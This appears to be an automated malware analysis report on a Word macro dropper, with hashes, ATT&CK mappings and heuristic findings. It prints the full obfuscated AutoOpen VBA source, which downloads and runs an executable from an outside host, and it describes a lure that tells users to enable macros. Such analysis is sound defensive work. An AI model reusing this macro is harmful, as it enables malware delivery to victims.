Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ad3279479d4d71bb…

MALICIOUS

Office (OLE)

Size: 52.0 KB
Created: 2015-07-03 22:20:00
Authoring application: Microsoft Office Word
First seen: 2015-09-14
MD5: 94c2459aa2440f2143fd79a74016d629
SHA-1: efa09b39dbbeb624c161d50b281f8cfa93e39a12
SHA-256: ad3279479d4d71bb11f7053715bb6a90e0903b511dd05a86ccdd4dc7c9fe59b1
Risk score: 310

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing VBA macros. The 'AutoOpen' macro, which runs when the document is opened, uses 'CreateObject' and 'WScript.Shell' to run a decoded script that likely downloads and executes a second-stage payload from the URL 'http://surgut-oil.ru/general/hally.exe'. The document body explicitly instructs the user to 'ENABLE MACROS', a social engineering lure intended to bypass Office macro security settings.

Heuristics (10)

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    CreateObject("WScript.Shell").Run (ce359afb8d5615d34553f2575844de80), 0, True
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    ce2796d03fc5bb94655c5e9467628721 = CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs (channel label in brackets):
    • http://surgut-oil.ru/general/hally.exe [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main [In document text (OLE body)]
    • https://www.google.com/images/srpr/logo1w.png [In document text (OLE body)]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10175 bytes
SHA-256: 3d0dd126ce1f4b45c514ccac6d67bfe70e1497149d7a0c31a90ede355195e123

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim ed6ec970f7eaa11d956da59b8f208b09, ab60888ce3cf07bf971294eb0017f31e, ce359afb8d5615d34553f2575844de80
Dim c66ca3f99e57c970a60975d1d5600bc5, beaf92e375bfe5778fa0d1fc4e1dd473, a14fb443b6f04f2a27a84599dfa87763
Dim ed8524e68f8b931e61a60c717e74f6ee, ce2796d03fc5bb94655c5e9467628721, f22a3bf293afba2159c18e9ee0ae2c8d
Dim abac7dd6a1b97d5a437081266bae2272, e5088866c0feaa560cf505b87e2eb67b, c2e092c85daf48b8ec89a17527e5dd4b
Dim f7eb61a29a5d75f66ecba4be1fafe180, b36701f7311e7c5027f995fb012fc776, a912e784362afee9ec4f89cb9701406a
Dim ce104bc217f117fb348f38c1e0b22ec7, a31c4705ba4216fda913db05409af2be, c6c194089780ab10371201b31b1196cb
Dim d5a6022e97e414576d538de41bec2e8e, ac48e9a8f8306da469ee13f5c4a3ae5f, d9772d2442837f9b88f601b8b6065ba4
Dim f99b5f7bdc88f155e93c6e2b4641f39e, b9b6450317544bebe90a236374fbd99a, f4a7353adc9d2ddaf74c1b8edd61c2ab
Dim b091bf765e8d5053db42fc1682d72bbd, f795193595febe256f24b80bbc8185eb, a06e1be303deef5b6efb8f03bfb937b7
Dim aba196fcb8ba96030c5a9e5fcd7f4280, d2484fa4a9761e8ebf9dcdac72cf51b5, f339b79ad13d0ba88bbbf63181df38d8
Dim faf103fa5ac95904cfd2caf973d47404, e15eb347a1b6ff6cf3699f29a5b067a3, f653ff76bd02a18be136c5c8d76185cb
Dim edf4747994e471ebe5186247938c7899, e7aa9b61a480a93d07369734fc7782ed, a5faf0421edaedabb50af61309bf3a50
Dim b114c8a23f5df776777d9648aed8f991, ba79ab39178f76a4fa88a7b71f36fac4, d69225c9d44d966a6b64159c37cb00f4
Dim bc798b1913e5da6aa35dbc9ed5de99ec, b03c3a03a9a04250feb76a8b13865dbe, db1a7d643ae0c04e81d7df83b2aefa30
Dim ea46283cd4b19effbfb8403e804accaf, ef76e9128ba0cf9909b1f63ea3850d74, e8d56032105d2c3df35ee8de7be4e089
'''''''''''''''''''''''''''''''''''''''
beaf92e375bfe5778fa0d1fc4e1dd473 = "http://surgut-oil.ru/general/hally.exe"
ce2796d03fc5bb94655c5e9467628721 = CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)
'''''''''''''''''''''''''''''''''''''''
f4a7353adc9d2ddaf74c1b8edd61c2ab = "NjcmlwdC5TaGVsbCJeKSAmIGVjaG8gSWYg": e15eb347a1b6ff6cf3699f29a5b067a3 = "pICYgZWNobyBTZXQgYyA9IE5vdGh"
a5faf0421edaedabb50af61309bf3a50 = 1445614 + 123
f653ff76bd02a18be136c5c8d76185cb = "pbmcgJiBlY2hvIFNldCBkID0gTm90aGluZyAmIGVjaG8gU2V0IGUgPSBOb3Roa"
e8d56032105d2c3df35ee8de7be4e089 = 87898788 + e8d56032105d2c3df35ee8de7be4e089: ac48e9a8f8306da469ee13f5c4a3ae5f = "dGVPYmplY3ReKCJNU1hNTDIuWE1MSFRUUCJeKSAmIGVjaG8gU2V0IGQgPSBDcmVhd"
d9772d2442837f9b88f601b8b6065ba4 = "GVPYmplY3ReKCJTY3JpcHRpbmcuRml": e8d56032105d2c3df35ee8de7be4e089 = "asdsadasdsadasdASdsad"
d69225c9d44d966a6b64159c37cb00f4 = 45654532
f795193595febe256f24b80bbc8185eb = "BjLlN0YXR1cyA9IDIwMCBUaGVuICYgZWNoby": faf103fa5ac95904cfd2caf973d47404 = "gSWYgJiBlY2hvIGQuRGVsZXRlRmlsZV4oV1NjcmlwdC5TY3JpcHRGdWxsTmFtZV4"
ef76e9128ba0cf9909b1f63ea3850d74 = "hiXikgVGhlbiAmIGVjaG8gZi5SdW5eKGJeKSAmIGVjaG8gRW5kIElmICYgZWNobyBFbmQ"
ea46283cd4b19effbfb8403e804accaf = "ZC5GaWxlRXhpc3RzXihiXikgVGhlbiBkLkRlbGV0ZUZpbGVeKGJeKSAmIGVjaG8": b114c8a23f5df776777d9648aed8f991 = a5faf0421edaedabb50af61309bf3a50 + 111
b091bf765e8d5053db42fc1682d72bbd = "gYy5vcGVuICJHRVQiLCBhLCBGYWxzZSAmIGVjaG8gYy5zZW5kICYgZWNobyBJZi"
ba79ab39178f76a4fa88a7b71f36fac4 = 456666: f99b5f7bdc88f155e93c6e2b4641f39e = "sZVN5c3RlbU9iamVjdCJeKSAmIGVjaG8gU2V0IGUgPSBDcmVhdGVPYmplY3ReKCJ"
d69225c9d44d966a6b64159c37cb00f4 = 787854
a06e1be303deef5b6efb8f03bfb937b7 = "BXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI"
d69225c9d44d966a6b64159c37cb00f4 = a5faf0421edaedabb50af61309bf3a50 + 4566: d5a6022e97e414576d538de41bec2e8e = "Jldl4oYSwgIi8iXikgXisgMSwgTGVuXihhXileKSAmIGVjaG8gU2V0IGMgPSBDcmVh"
ba79ab39178f76a4fa88a7b71f36fac4 = 75454 + a5faf0421edaedabb50af61309bf3a50: a31c4705ba4216fda913db05409af2be = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ"
c6c194089780ab10371201b31b1196cb = "odHRwczovL3d3dy5nb29nbGUuY29tL2ltYWdlcy9zcnByL2xvZ28xdy5wbmciICYgZ"
a5faf0421edaedabb50af61309bf3a50 = 6565666: db1a7d643ae0c04e81d7df83b2aefa30 = "WNobyBiID0gTWlkXihhLCBJblN0cl"
e8d56032105d2c3df35ee8de7be4e089 = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ"
b9b6450317544bebe90a236374fbd99a = "BRE9EQi5TdHJlYW0iXikgJiBlY2hvIFNldCBmID0gQ3JlYXRlT2JqZWN0XigiV1": b114c8a23f5df776777d9648aed8f991 = 786455
aba196fcb8ba96030c5a9e5fcd7f4280 = "GVjaG8gLk9wZW4gJiBlY2hvIC5Xcml0ZSBjLnJlc3BvbnNlQm9keSAmIGVjaG8gLlNh"
d2484fa4a9761e8ebf9dcdac72cf51b5 = "dmVUb0ZpbGUgYiAmIGVjaG8gLkNsb3NlICYgZWNobyBFbmQgV2l0aCAmIGVjaG8"
f339b79ad13d0ba88bbbf63181df38d8 = "gSWYgZC5GaWxlRXhpc3RzXi": edf4747994e471ebe5186247938c7899 = "W5nICYg"
e7aa9b61a480a93d07369734fc7782ed = "ZWNobyBTZXQgZiA9IE5vdGhpbmcpID4geC52YnMgJiBzdGFydCB4LnZicw==": a912e784362afee9ec4f89cb9701406a = 3
a14fb443b6f04f2a27a84599dfa87763 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
ed6ec970f7eaa11d956da59b8f208b09 = a31c4705ba4216fda913db05409af2be + c6c194089780ab10371201b31b1196cb + db1a7d643ae0c04e81d7df83b2aefa30 + d5a6022e97e414576d538de41bec2e8e + ac48e9a8f8306da469ee13f5c4a3ae5f + d9772d2442837f9b88f601b8b6065ba4
ed6ec970f7eaa11d956da59b8f208b09 = ed6ec970f7eaa11d956da59b8f208b09 + f99b5f7bdc88f155e93c6e2b4641f39e + b9b6450317544bebe90a236374fbd99a + f4a7353adc9d2ddaf74c1b8edd61c2ab + ea46283cd4b19effbfb8403e804accaf + b091bf765e8d5053db42fc1682d72bbd
ed6ec970f7eaa11d956da59b8f208b09 = ed6ec970f7eaa11d956da59b8f208b09 + f795193595febe256f24b80bbc8185eb + a06e1be303deef5b6efb8f03bfb937b7 + aba196fcb8ba96030c5a9e5fcd7f4280 + d2484fa4a9761e8ebf9dcdac72cf51b5 + f339b79ad13d0ba88bbbf63181df38d8
ed6ec970f7eaa11d956da59b8f208b09 = ed6ec970f7eaa11d956da59b8f208b09 + ef76e9128ba0cf9909b1f63ea3850d74 + faf103fa5ac95904cfd2caf973d47404 + e15eb347a1b6ff6cf3699f29a5b067a3 + f653ff76bd02a18be136c5c8d76185cb + edf4747994e471ebe5186247938c7899
ed6ec970f7eaa11d956da59b8f208b09 = ed6ec970f7eaa11d956da59b8f208b09 + e7aa9b61a480a93d07369734fc7782ed
ed6ec970f7eaa11d956da59b8f208b09 = Replace(ed6ec970f7eaa11d956da59b8f208b09, vbCrLf, "")
a5faf0421edaedabb50af61309bf3a50 = 6565666: ed6ec970f7eaa11d956da59b8f208b09 = Replace(ed6ec970f7eaa11d956da59b8f208b09, vbTab, "")
f339b79ad13d0ba88bbbf63181df38d8 = "gSWYgZC5GaWxlRXhpc3RzXi"
ed6ec970f7eaa11d956da59b8f208b09 = Replace(ed6ec970f7eaa11d956da59b8f208b09, " ", "")
ab60888ce3cf07bf971294eb0017f31e = Len(ed6ec970f7eaa11d956da59b8f208b09): For c66ca3f99e57c970a60975d1d5600bc5 = 1 To ab60888ce3cf07bf971294eb0017f31e Step 4
f22a3bf293afba2159c18e9ee0ae2c8d = 3
e8d56032105d2c3df35ee8de7be4e089 = "GVjaG8gLk9wZW4gJiBlY2hvIC5Xcml0ZSBjLnJlc3BvbnNlQm9keSAmIGVjaG8gLlNh"
b36701f7311e7c5027f995fb012fc776 = 0: b03c3a03a9a04250feb76a8b13865dbe = b36701f7311e7c5027f995fb012fc776
a06e1be303deef5b6efb8f03bfb937b7 = "BXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI": bc798b1913e5da6aa35dbc9ed5de99ec = 6: For abac7dd6a1b97d5a437081266bae2272 = b03c3a03a9a04250feb76a8b13865dbe To a912e784362afee9ec4f89cb9701406a
e8d56032105d2c3df35ee8de7be4e089 = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ"
e5088866c0feaa560cf505b87e2eb67b = Mid(ed6ec970f7eaa11d956da59b8f208b09, c66ca3f99e57c970a60975d1d5600bc5 + abac7dd6a1b97d5a437081266bae2272, 1)
ce104bc217f117fb348f38c1e0b22ec7 = 2: b36701f7311e7c5027f995fb012fc776 = ce104bc217f117fb348f38c1e0b22ec7 + 1
ef76e9128ba0cf9909b1f63ea3850d74 = "hiXikgVGhlbiAmIGVjaG8gZi5SdW5eKGJeKSAmIGVjaG8gRW5kIElmICYgZWNobyBFbmQ"
e8d56032105d2c3df35ee8de7be4e089 = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ"
b9b6450317544bebe90a236374fbd99a = "BRE9EQi5TdHJlYW0iXikgJiBlY2hvIFNldCBmID0gQ3JlYXRlT2JqZWN0XigiV1"
If e5088866c0feaa560cf505b87e2eb67b = "=" Then
f22a3bf293afba2159c18e9ee0ae2c8d = f22a3bf293afba2159c18e9ee0ae2c8d - 1
ba79ab39178f76a4fa88a7b71f36fac4 = "gSWYgJiBlY2hvIGQuRGVsZXRlRmlsZV4oV1NjcmlwdC5TY3JpcHRGdWxsTmFtZV4"
c2e092c85daf48b8ec89a17527e5dd4b = b03c3a03a9a04250feb76a8b13865dbe
Else
c2e092c85daf48b8ec89a17527e5dd4b = InStr(1, a14fb443b6f04f2a27a84599dfa87763, e5088866c0feaa560cf505b87e2eb67b, vbBinaryCompare) - 1: End If
b36701f7311e7c5027f995fb012fc776 = ce104bc217f117fb348f38c1e0b22ec7 + ed8524e68f8b931e61a60c717e74f6ee - 1000 * 5 - ed8524e68f8b931e61a60c717e74f6ee
b03c3a03a9a04250feb76a8b13865dbe = 64 * b03c3a03a9a04250feb76a8b13865dbe + c2e092c85daf48b8ec89a17527e5dd4b: Next
c6c194089780ab10371201b31b1196cb = "BXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI": b03c3a03a9a04250feb76a8b13865dbe = Hex(b03c3a03a9a04250feb76a8b13865dbe)
a06e1be303deef5b6efb8f03bfb937b7 = "BXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI"
d69225c9d44d966a6b64159c37cb00f4 = a5faf0421edaedabb50af61309bf3a50 + 4566
d5a6022e97e414576d538de41bec2e8e = "Jldl4oYSwgIi8iXikgXisgMSwgTGVuXihhXileKSAmIGVjaG8gU2V0IGMgPSBDcmVh"
ba79ab39178f76a4fa88a7b71f36fac4 = 75454 + a5faf0421edaedabb50af61309bf3a50
b03c3a03a9a04250feb76a8b13865dbe = String(bc798b1913e5da6aa35dbc9ed5de99ec - Len(b03c3a03a9a04250feb76a8b13865dbe), "0") & b03c3a03a9a04250feb76a8b13865dbe
f7eb61a29a5d75f66ecba4be1fafe180 = Chr(CByte("&H" & Mid(b03c3a03a9a04250feb76a8b13865dbe, 1, 2))) + Chr(CByte("&H" & Mid(b03c3a03a9a04250feb76a8b13865dbe, 3, 2))) + Chr(CByte("&H" & Mid(b03c3a03a9a04250feb76a8b13865dbe, 5, 2)))
ce359afb8d5615d34553f2575844de80 = ce359afb8d5615d34553f2575844de80 & Left(f7eb61a29a5d75f66ecba4be1fafe180, f22a3bf293afba2159c18e9ee0ae2c8d): Next
ce359afb8d5615d34553f2575844de80 = Replace(ce359afb8d5615d34553f2575844de80, "https://www.google.com/images/srpr/logo1w.png", beaf92e375bfe5778fa0d1fc4e1dd473)
f339b79ad13d0ba88bbbf63181df38d8 = "gSWYgZC5GaWxlRXhpc3RzXi"
ce359afb8d5615d34553f2575844de80 = Replace(ce359afb8d5615d34553f2575844de80, "c:\users\public\documents", ce2796d03fc5bb94655c5e9467628721)
e8d56032105d2c3df35ee8de7be4e089 = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ"
ce359afb8d5615d34553f2575844de80 = Replace(ce359afb8d5615d34553f2575844de80, "x.vbv", "x.vbs")
CreateObject("WScript.Shell").Run (ce359afb8d5615d34553f2575844de80), 0, True
End Sub